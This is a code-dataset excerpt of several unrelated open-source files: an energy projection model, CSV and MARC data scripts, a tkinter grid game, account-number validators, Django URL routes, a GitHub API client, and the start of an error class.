pd.to_numeric(change_parameters.loc[\"parameter a min\"].value),\n pd.to_numeric(change_parameters.loc[\"parameter a max\"].value),\n ),\n (\n pd.to_numeric(change_parameters.loc[\"parameter b min\"].value),\n pd.to_numeric(change_parameters.loc[\"parameter b max\"].value),\n ),\n (\n pd.to_numeric(change_parameters.loc[\"saturation point\"].value),\n pd.to_numeric(change_parameters.loc[\"saturation point\"].value),\n ),\n (\n y_data[10],\n y_data[10],\n ),\n ]\n\n # Define sum of squared error function\n def sum_of_squared_error(change_parameters):\n return np.sum(\n (y_data - logistic(x_data, *change_parameters)) ** 2.0\n )\n\n # Generate genetic_parameters. For baseline scenarios, projections are linear\n if change_model == \"linear\":\n y = linear(\n x_data,\n min(\n 0.04,\n max(0.00001, ((y_data[-1] - y_data[0]) / len(y_data))),\n ),\n 0,\n 0,\n y_data[10],\n )\n genetic_parameters = [0, 0, 0, 0]\n else:\n genetic_parameters = differential_evolution(\n sum_of_squared_error,\n search_bounds,\n seed=3,\n polish=False,\n updating=\"immediate\",\n mutation=(0, 1),\n ).x\n\n y = np.array(logistic(np.arange(0, 500, 1), *genetic_parameters))\n\n # Rejoin with input data at point where projection curve results in smooth\n # growth\n y = np.concatenate(\n [\n input_data.loc[: input_data.last_valid_index()].values,\n y[\n y >= input_data.loc[input_data.last_valid_index()]\n ].squeeze(),\n ]\n )[: (output_end_date + 1 - input_data.first_valid_index())]\n\n return pd.Series(\n data=y[\n : len(\n np.arange(\n input_data.first_valid_index(), output_end_date + 1, 1\n )\n )\n ],\n index=np.arange(\n input_data.first_valid_index(), output_end_date + 1, 1\n ),\n name=input_data.name,\n )\n\n per_elec_supply.update(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Estimate the rate of nonrenewable electricity generation being replaced by\n # renewable electricity generation\n nonrenewable_to_renewable = pd.concat(\n [\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, :data_end_year]\n * 0,\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n )\n\n # Update nonrenewables electricity generation\n nonrenew = pd.concat(\n [\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n 1\n - per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, :data_end_year]\n * 0,\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ]\n .parallel_apply(\n lambda x: x.multiply(\n 1\n - per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(\n pd.concat(\n [pd.Series(renewables), pd.Series(\"RELECTR\")]\n )\n )\n ]\n .groupby([\"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n )\n\n elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ] = elec_supply[\n ~elec_supply.index.get_level_values(6).isin(\n pd.concat([pd.Series(renewables), pd.Series(\"RELECTR\")])\n )\n ].parallel_apply(\n lambda x: (x + nonrenew.loc[x.name]).clip(lower=0), axis=1\n )\n\n # Set renewables generation to meet RELECTR in the proportion estimated by\n # adoption_projection(), and nonrenewable electricity generation that shifts to\n # renewable generation\n elec_supply.update(\n pd.concat(\n [\n elec_supply[\n elec_supply.index.get_level_values(6).isin(renewables)\n ].loc[:, :data_end_year],\n +per_elec_supply[\n per_elec_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: x.multiply(\n nonrenewable_to_renewable.groupby(\n [\"region\"], observed=True\n )\n .sum(0)\n .loc[x.name[2]]\n + elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n .loc[:, data_end_year + 1 :],\n ],\n axis=1,\n )\n )\n\n # Recast RELECTR to ELECTR in Final consumption\n energy_post_electrification.reset_index(inplace=True)\n energy_post_electrification[\n (energy_post_electrification[\"product_short\"] == \"RELECTR\")\n & (energy_post_electrification[\"flow_category\"] == \"Final consumption\")\n ] = (\n energy_post_electrification[\n (energy_post_electrification[\"product_short\"] == \"RELECTR\")\n & (\n energy_post_electrification[\"flow_category\"]\n == \"Final consumption\"\n )\n ]\n .replace({\"RELECTR\": \"ELECTR\"})\n .replace({\"Renewable Electricity\": \"Electricity\"})\n )\n\n energy_post_electrification.set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ]\n )\n\n energy_post_electrification = energy_post_electrification.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n ).sum(numeric_only=True)\n\n energy_post_electrification.drop(labels=\"RELECTR\", level=6, inplace=True)\n\n # Drop RELECTR now that it has been reallocated to the specific set of renewables\n elec_supply.drop(labels=\"RELECTR\", level=6, inplace=True)\n\n # Recalculate percent of total consumption each technology meets\n per_elec_supply = elec_supply.parallel_apply(\n lambda x: x.divide(\n elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Recalculate elec_supply to cover energy_post_electrification product_long =\n # \"Electricity\" flow_category = \"Final consumption\"\n elec_supply = per_elec_supply.parallel_apply(\n lambda x: x.multiply(\n energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().product_long\n == \"Electricity\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Final consumption\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().nonenergy\n == \"N\"\n ).values\n )\n ]\n .groupby([\"model\", \"scenario\", \"region\"], observed=True)\n .sum(numeric_only=True)\n .loc[x.name[0], x.name[1], x.name[2]]\n ),\n axis=1,\n )\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(elec_supply)\n\n # endregion\n\n ##############################\n # ESTIMATE UPDATED HEAT MIX #\n ##############################\n\n # region\n\n renewables = [\"GEOTHERM\", \"SOLARTH\"]\n\n # For each region, for each subsector ('Low Temperature', 'High Temperature'), find\n # the percent of total heat consumption met by each renewable product. heat_supply\n # is 'Heat output' from the 'Electricity and Heat' product category, plus other\n # products that are consumed within residential, commercial, and industrial sectors\n # directly for heat.\n heat_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Heat output\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == \"N\").values)\n ]\n\n per_heat_supply = heat_supply.parallel_apply(\n lambda x: x.divide(\n heat_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total heat consumption met by each renewable\n # product to estimate projected percent of total heat consumption each meets\n per_heat_supply.update(\n per_heat_supply[\n per_heat_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Set renewables heat generation to meet the amount estimated in Jacobson et al.\n # (2016) to provide storage services.\n heat_supply.update(\n per_heat_supply[\n per_heat_supply.index.get_level_values(6).isin(renewables)\n ].parallel_apply(\n lambda x: x.multiply(\n heat_supply[\n heat_supply.index.get_level_values(6).isin(renewables)\n ]\n .groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n )\n\n # Recalculate percent of total consumption each technology meets\n per_heat_supply = heat_supply.parallel_apply(\n lambda x: x.divide(\n heat_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(heat_supply)\n\n # endregion\n\n ###############################################\n # ESTIMATE UPDATED NONELECTRIC TRANSPORT MIX #\n ###############################################\n\n # region\n\n renewables = [\"HYDROGEN\"]\n\n # For each region, find the percent of total nonelectric energy consumption met by\n # each product.\n transport_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().sector\n == \"Transportation\"\n ).values\n )\n & (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Final consumption\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == \"N\").values)\n ]\n\n per_transport_supply = transport_supply.parallel_apply(\n lambda x: x.divide(\n transport_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total nonelectric transport consumption met by each\n # renewable product to estimate projected percent of total heat consumption each\n # meets\n per_transport_supply.update(\n per_transport_supply[\n per_transport_supply.index.get_level_values(6).isin(renewables)\n ]\n .parallel_apply(\n lambda x: adoption_projection(\n input_data=x.loc[:data_end_year],\n saturation_date=2050,\n output_end_date=proj_end_year,\n change_model=\"logistic\",\n change_parameters=parameters.loc[\n x.name[2], x.name[6], scenario, x.name[3]\n ],\n ),\n axis=1,\n )\n .clip(upper=1)\n )\n\n # Set renewables nonelectric transport generation to meet the amount estimated\n transport_supply.update(\n per_transport_supply[\n per_transport_supply.index.get_level_values(6).isin(renewables)\n ].parallel_apply(\n lambda x: x.multiply(\n transport_supply[\n transport_supply.index.get_level_values(6).isin(renewables)\n ]\n .groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n )\n )\n\n # Recalculate percent of total consumption each technology meets\n per_transport_supply = transport_supply.parallel_apply(\n lambda x: x.divide(\n transport_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Update energy_post electrification with new renewables technology mix values\n energy_post_electrification.update(transport_supply)\n\n # endregion\n\n #################\n # SAVE OUTPUT #\n #################\n\n # region\n\n # Drop rows that have all zeros\n energy_post_upstream = energy_post_upstream[\n energy_post_upstream.sum(axis=1) != 0\n ]\n energy_post_addtl_eff = energy_post_addtl_eff[\n energy_post_addtl_eff.sum(axis=1) != 0\n ]\n energy_electrified = energy_electrified[\n energy_electrified.sum(axis=1) != 0\n ]\n energy_reduced_electrified = energy_reduced_electrified[\n energy_reduced_electrified.sum(axis=1) != 0\n ]\n energy_post_electrification = energy_post_electrification[\n energy_post_electrification.sum(axis=1) != 0\n ]\n per_elec_supply = per_elec_supply[per_elec_supply.sum(axis=1) != 0]\n per_heat_supply = per_heat_supply[per_heat_supply.sum(axis=1) != 0]\n per_transport_supply = per_transport_supply[\n per_transport_supply.sum(axis=1) != 0\n ]\n\n # Combine percent output for electricity, heat, transport\n energy_percent = pd.concat(\n [per_elec_supply, per_heat_supply, per_transport_supply]\n )\n\n # Combine baseline and pathway energy output, drop 'hydrogen', 'flexible', 'nonenergy' flags:\n energy_output = pd.concat([energy_baseline, energy_post_electrification])\n energy_output.index = energy_output.index.droplevel(\n [\"hydrogen\", \"flexible\", \"nonenergy\"]\n )\n\n # Save\n for output in [\n (energy_post_upstream, \"energy_post_upstream\"),\n (energy_post_addtl_eff, \"energy_post_addtl_eff\"),\n (energy_electrified, \"energy_electrified\"),\n (energy_reduced_electrified, \"energy_reduced_electrified\"),\n (energy_output, \"energy_output\"),\n (energy_percent, \"energy_percent\"),\n ]:\n output[0].columns = output[0].columns.astype(str)\n for col in output[0].select_dtypes(include=\"float64\").columns:\n output[0][col] = output[0][col].astype(\"float32\")\n output[0].groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n ],\n observed=True,\n ).sum(numeric_only=True).sort_index().to_parquet(\n \"podi/data/\" + output[1] + \".parquet\", compression=\"brotli\"\n )\n output[0].columns = output[0].columns.astype(int)\n\n energy_output = (\n energy_output.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n .sort_index()\n )\n\n # endregion\n\n return\n","repo_name":"Epic-Institute/positive-disruption","sub_path":"podi/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":76496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22098953722","text":"import pandas as pd\r\n\r\ndef create_HDI_date(data: str, save_to: str):\r\n df = pd.read_csv(f'{data}')\r\n # Extract the desired columns into a new dataframe\r\n new_df = df[['iso3', 'country', 'hdi_2021', 'gdi_2021', 'le_f_2021', 'le_m_2021', 'mys_f_2021', 'mys_m_2021', 'gni_pc_f_2021', 'gni_pc_m_2021', 'ineq_le_2021', 'ineq_edu_2021', 'ineq_inc_2021']]\r\n # Add a new column called 'Label' based on the 'hdi' values\r\n new_df['Label'] = pd.cut(new_df['hdi_2021'], bins=[0, 0.55, 0.7, 0.8, 1], labels=[4, 3, 2, 1])\r\n # Remove rows where the 'iso3' column starts with 'ZZ' (OPTIONAL)\r\n new_df = new_df[~new_df['iso3'].str.startswith('ZZ')]\r\n new_df.to_csv(f'{save_to}')\r\n \r\ndef append_2021_HDI_data(original_data, data_2021):\r\n df1 = pd.read_csv(f'{original_data}', index_col='Country_code')\r\n df2 = pd.read_csv(f'{data_2021}', index_col='iso3')\r\n\r\n # select the columns we want to append from df2 (Region is Optional and only used for testing)\r\n df2 = df2[['region', 'hdi_2020', 'hdi_2021']]\r\n\r\n # append the columns to df1, inserting them at position 31 and 32\r\n #df1.insert(0, 'region', df2['region'])\r\n df1.insert(31, '2020', df2['hdi_2020'])\r\n df1.insert(32, '2021', df2['hdi_2021'])\r\n\r\n df1.to_csv('merged_file.csv')\r\n \r\n","repo_name":"matthewjmccarthy/CS3205-Lab1","sub_path":"createCSV.py","file_name":"createCSV.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70728865106","text":"import sys\n\nfrom tkinter import Tk, Canvas, mainloop, ALL, Label\n\nfrom tkinter.messagebox import showinfo\n\nfrom wilderness import GameMap, Player, Game\n\nimport baselines\n\n# Game map settings\nMAP_WIDTH = 10\nMAP_HEIGTH = 10\n\n# Player\nPLAYER_VISION = 100\n\n# TK\nDEFAULT_TILE_SIZE = 30\n\nCANVAS_WIDTH = 1000\nCANVAS_HEIGTH = 1000\nCANVAS_OFFSET = 0 #int(CANVAS_WIDTH/2) - PLAYER_VISION * DEFAULT_TILE_SIZE\n\n\nclass TkGame(Game):\n\n tile_size = DEFAULT_TILE_SIZE\n\n keyboard_to_action = {\n 'w': 'up',\n 's': 'down',\n 'a': 'left',\n 'd': 'right'\n }\n\n def __init__(self, game_map, players, vision=PLAYER_VISION):\n super().__init__(game_map, players, vision)\n\n root = Tk()\n # Label(root, text=\"Red Sun\", bg=\"red\", fg=\"white\").pack()\n\n self.canvas = Canvas(root, width=CANVAS_WIDTH, height=CANVAS_HEIGTH)\n self.canvas.pack()\n\n self.input_enabled = False\n\n def evaluate(self):\n # Evaluate game state\n if self.game_map.is_player_at_exit(self.players[0]):\n self.input_enabled = False\n showinfo(\"Exit found!\", \"Player found exit after %s steps. \\n\\nTotal penalty = %s\" % (self.players[0].steps, self.players[0].score))\n sys.exit()\n\n def render(self):\n self.canvas.delete(ALL)\n\n for p in self.players:\n game.show_terrain_for(p)\n\n self.draw_markers(self.game_map.markers)\n\n self.draw_panel()\n\n def tk_display_around(self, xr, yr, dist):\n terrain_matrix = self.game_map.get_terrain_around(xr, yr, dist)\n\n self.draw_terrain_matrix(terrain_matrix)\n\n return terrain_matrix\n\n def show_terrain_for(self, player):\n return self.tk_display_around(player.x, player.y, self.vision)\n\n def draw_terrain_matrix(self, terrain_matrix):\n\n for i in range(len(terrain_matrix)):\n for j in range(len(terrain_matrix[i])):\n terrain = terrain_matrix[i][j]\n\n x1 = i * self.tile_size + CANVAS_OFFSET\n y1 = j * self.tile_size + CANVAS_OFFSET\n\n x2 = (i+1) * self.tile_size + CANVAS_OFFSET\n y2 = (j+1) * self.tile_size + CANVAS_OFFSET\n\n # x1,y1,x2,y2\n self.canvas.create_rectangle(x1, y1, x2, y2, fill=terrain.color)\n\n def draw_markers(self, markers):\n\n for marker in markers:\n x1 = marker.x * self.tile_size + CANVAS_OFFSET\n y1 = marker.y * self.tile_size + CANVAS_OFFSET\n\n x2 = (marker.x+1) * self.tile_size + CANVAS_OFFSET\n y2 = (marker.y+1) * self.tile_size + CANVAS_OFFSET\n\n # x1,y1,x2,y2\n self.canvas.create_oval(x1, y1, x2, y2, fill=marker.color)\n\n def draw_panel(self):\n self.canvas.create_text(920, 100, text=\"Penalty: %s\" % self.players[0].score)\n\n def draw_game_end_text(self):\n self.canvas.create_text(920, 200, text=\"Exit found!\")\n\n def draw_map(self):\n self.draw_terrain_matrix(self.game_map._terrain)\n\n #\n # Event handlers\n #\n ################################\n def callback_Button_1(self, event):\n self.canvas.focus_set()\n print(\"clicked at\", event.x, event.y)\n\n def callback_Key(self, event):\n print(\"Pressed char = %s\" % event.char)\n\n action = self.keyboard_to_action.get(event.char, None)\n\n if not action or not self.input_enabled:\n return\n\n self.player_action(player1, action)\n\n self.evaluate()\n\n self.render()\n\n def configure_inputs(self):\n self.canvas.bind(\"\", self.callback_Key)\n\n self.canvas.bind(\"\", self.callback_Button_1)\n\n self.canvas.pack()\n\n\nif __name__ == '__main__':\n\n game_map = GameMap(MAP_WIDTH, MAP_HEIGTH)\n player1 = Player(u'Human One', 0, 0)\n game = TkGame(game_map, [player1], PLAYER_VISION)\n\n # Show initial terrain\n\n input_char = ''\n last_cost = 0\n\n game.configure_inputs()\n\n game.render()\n\n game.input_enabled = True\n\n mainloop()\n","repo_name":"Hanserfaust/tk-ai-lab","sub_path":"tkinter_wilderness.py","file_name":"tkinter_wilderness.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3586319925","text":"import pymarc\nimport time\n\nwriter = pymarc.MARCWriter(file('free_ebooks.marc', 'w'))\nerror = open('errors.txt', 'w')\n\ncount = 0\n\nfor line in open('marc_urls.txt'):\n try:\n marcrec = pymarc.parse_xml_to_array(line)\n writer.write(marcrec[0]) \n except:\n error.write(line)\n\n count += 1\n time.sleep(0.3) #try to be nice to IA servers\n if (count % 1000) == 0:\n time.sleep(600) #try to be nice to IA servers\n\nwriter.close()\n\n \n \n \n","repo_name":"no-reply/ol-marc","sub_path":"olmarc.py","file_name":"olmarc.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4675952843","text":"#author: n01\n\"\"\"\nGraphical characters are the Unicode escape sequences to be used to\nprint symbols on both Windows and Linux platorm\n\nPersonal Note:\nI'm lucky to have started the project on a system and a terminal that could\nanswer to my creativity. I must know try to adjust the whole thing for lesser fortunate\nterminals out there. Windows is a special case of love and hate, more hate than love.\n\"\"\"\nfrom sys import platform\n\nBLOCK_1 = \"\\u2591\" # ░\nBLOCK_2 = \"\\u2592\" # ▒\nBLOCK_3 = \"\\u2593\" # ▓\nBLOCK = \"\\u2588\" # █\n\nBLOCKS = [BLOCK_1, BLOCK_2, BLOCK_3, BLOCK]\n\nBULLET_BLOCK = \"\\u2589\" # ▉ ~ ▉▉▉\nCHESS_BLOCK = \" \" + \"\\u259E\"*3 + \" \" # ▞▞▞\n\nif(platform == \"win32\"):\n BULLET_BLOCK = BLOCK #Windows doesn't support the character\n CHESS_BLOCK = \" --- \" #Windows doesn't support also this character\n","repo_name":"Jac-Lazza/termiko","sub_path":"constants/graphical_characters.py","file_name":"graphical_characters.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30136065784","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefines core functions and classes for QuEBA.\n\"\"\"\n\n__author__ = 'Hazeltek Solutions'\n__version__ = '0.1'\n\n\nfrom abc import ABCMeta, abstractmethod\n\n\n\nclass QuEBAError(Exception):\n \"\"\"Base error class for QuEBA related errors.\"\"\"\n pass\n\n\n#+=============================================================================+\n#| Validator Classes\n#+=============================================================================+\nclass Validator(object):\n \"\"\"Represents the base validator for Validator objects.\"\"\"\n __metaclass__ = ABCMeta\n \n def __init__(self, error_message='validation failed'):\n self.error_message = error_message\n \n @abstractmethod\n def __call__(self, value):\n pass\n\n def format(self, value):\n \"\"\"Returns a formatted version of the validated value.\"\"\"\n return value\n\n\nclass BookNumberValidator(Validator):\n \"\"\"Validates an Accounts book number.\"\"\"\n \n def __init__(self, error_message='Invalid book number', format=True):\n super(BookNumberValidator, self).__init__(error_message)\n self._format = format\n\n def __call__(self, value):\n if value is None:\n return (value, self.error_message)\n\n book = value.replace('\\\\', '').replace('/','').replace('-', '')\n if len(book) != 6 or not self._isnumeric(book):\n return (value, self.error_message)\n \n buCode = int(book[:2])\n if buCode < 32 or buCode > 38:\n return (value, self.error_message)\n \n if self._format:\n return (self.format(book), None)\n return (value, None)\n \n def _isnumeric(self, value):\n try: l = long(value); return True\n except: False\n\n def format(self, value):\n return \"%s/%s/%s\" % (value[:2], value[2:4:], value[4:])\n\n\nclass AccountNumberValidator(BookNumberValidator):\n \"\"\"Validates an Accounts customer account number.\"\"\"\n \n def __init__(self, error_message='Invalid account number', format=True):\n super(AccountNumberValidator, self).__init__(error_message, format)\n\n def __call__(self, value):\n if value is None:\n return (value, self.error_message)\n \n acctno = value.replace('\\\\', '').replace('/', '').replace('-', '')\n if len(acctno) < 10 or len(acctno) > 12 or not self._isnumeric(acctno):\n return (value, self.error_message)\n \n # validate book part of account number\n result = super(AccountNumberValidator, self).__call__(acctno[:6])\n if result[1] is not None:\n return (value, self.error_message)\n \n # validate account validator digit which is Y in 'xx/xx/xx/xxxY-xx'\n # gotten as modulo of sum of positional weight of account number digits\n # excluding 'Y-xx'\n acct = acctno[:10]\n acct_digit_pos_weights = [\n int(acct[i]) * (i+1) \n for i in range(len(acct) - 1)\n ]\n\n acct_vld_digit = sum(acct_digit_pos_weights) % 10\n if acct[-1] != str(acct_vld_digit):\n return (value, self.error_message)\n \n if self._format:\n return (self.format(acctno), None)\n return (value, None)\n \n def format(self, value):\n return \"%s/%s/%s/%s%s\" % (\n value[:2], value[2:4], value[4:6], value[6:10],\n ('' if len(value) == 10 else '-%s' % value[10:])\n )\n\n ","repo_name":"hkmshb/queba-core","sub_path":"queba/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20471517254","text":"\"\"\"asset URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom hnf import views\n\nurlpatterns = [\n # 无论访问那个页面都会跳转到登陆页面\n url(r'^$', views.login),\n # 登陆\n url(r'^login', views.login),\n # 注销\n url(r'^logout', views.logout),\n # 搜索\n url(r'^search', views.search, name='search'),\n # django自带后台\n url(r'^admin/', admin.site.urls),\n # 展示页面\n url(r'^asset/list/$', views.asset_list, name='asset_list'),\n url(r'^asset/add/$', views.asset_add),\n url(r'^asset/edit/(?P\\d+)/$', views.asset_edit),\n url(r'^asset/del/(?P\\d+)/$', views.asset_del),\n # 导入\n url(r'^asset/import/$', views.asset_import),\n # 导入模板\n url(r'^asset/tpl/$', views.asset_tpl),\n\n]\n","repo_name":"huningfei/asset","sub_path":"asset/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"16084713671","text":"import pip._vendor.requests as requests\nfrom cli.scripts.github.props import GitHubProperties\nfrom cli.scripts.github.exceptions import GitHubError\nimport json\nfrom typing import List, Tuple\n\n# https://github.com/github/gitignore\n\n\nclass Client():\n def __init__(self, props: GitHubProperties):\n self.props = props\n\n def __path(self, *paths: str) -> str:\n return self.props.get(GitHubProperties.API_URL) + \"/\" + \"/\".join(paths)\n\n def __auth(self) -> Tuple[str, str]:\n return (self.props.get(GitHubProperties.USER), self.props.get(GitHubProperties.ACCESS_TOKEN))\n\n def __headers(self, *other_headers: List[Tuple[str, str]]) -> dict:\n headers = {\n 'Accept': self.props.get(GitHubProperties.HEADER_ACCEPT), 'Content-Type': self.props.get(GitHubProperties.HEADER_CONTENT_TYPE)\n }\n for name, value in other_headers:\n headers[name] = value\n return headers\n\n def __timeout(self) -> int:\n return int(self.props.get(GitHubProperties.TIMEOUT))\n\n def __user(self) -> str:\n return self.props.get(GitHubProperties.USER)\n\n def __get_body(self, response: requests.Response) -> dict:\n body = {}\n try:\n body = response.json()\n except:\n pass\n return {} if body is None else body\n\n def __process_response(self, response: requests.Response, successful_status_code: int = 200) -> dict:\n if not response:\n raise GitHubError()\n body = self.__get_body(response)\n if response.status_code != successful_status_code:\n if type(body) != dict:\n raise GitHubError()\n title = body.get('error', 'Error calling GitHub API')\n errors = [error.get('message') for error in body.get('errors', [])]\n raise GitHubError(title=title, errors=errors)\n else:\n return body\n\n def issues(self):\n pass\n\n def get_repositories(self, sort: str = 'full_name', direction: str = 'asc') -> List[dict]:\n next_page = self.__path('users', self.__user(), 'repos')\n while next_page:\n response = requests.get(\n url=next_page, params={'sort': sort, 'direction': direction}, auth=self.__auth(), headers=self.__headers(\n ('User-Agent', self.__user())\n ), timeout=self.__timeout()\n )\n body = self.__process_response(response)\n for repo in body:\n yield repo\n next_page = response.links.get('next', {}).get('url')\n\n def get_repositories_size(self, *args) -> int:\n size = 0\n for _ in self.get_repositories(*args):\n size += 1\n return size\n\n def create_repository(self, name: str, description: str, is_private=True) -> dict:\n response = requests.post(\n url=self.__path('user', 'repos'), auth=self.__auth(), data=json.dumps({\n 'name': name, 'description': description, 'private': is_private, 'homepage': '/'.join(['https://github.com/', self.__user(), name])\n }), headers=self.__headers(), timeout=self.__timeout()\n )\n body = self.__process_response(response, 201)\n return {\n 'id': body.get('id'), 'name': body.get('name'), 'owner': body.get('owner.login'), 'https': body.get('html_url'), 'ssh': body.get('ssh_url')\n }\n\n def delete_repository(self, name: str) -> None:\n response = requests.delete(\n url=self.__path('repos', self.__user(), name), auth=self.__auth(), headers=self.__headers(), timeout=self.__timeout()\n )\n self.__process_response(response, 204)\n","repo_name":"gluo7777/MyTools","sub_path":"cli/scripts/github/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35666014383","text":"## Standard Library\r\nimport os\r\n\r\n## Local\r\nfrom ...satlib import stderr, stdout\r\n\r\nclass SatError(Exception):\r\n 'Error'\r\n def __init__(self, msg=None, target=None):\r\n Exception.__init__(self, msg)\r\n self.msg = str(msg) if msg is not None else \"\"\r\n self.target 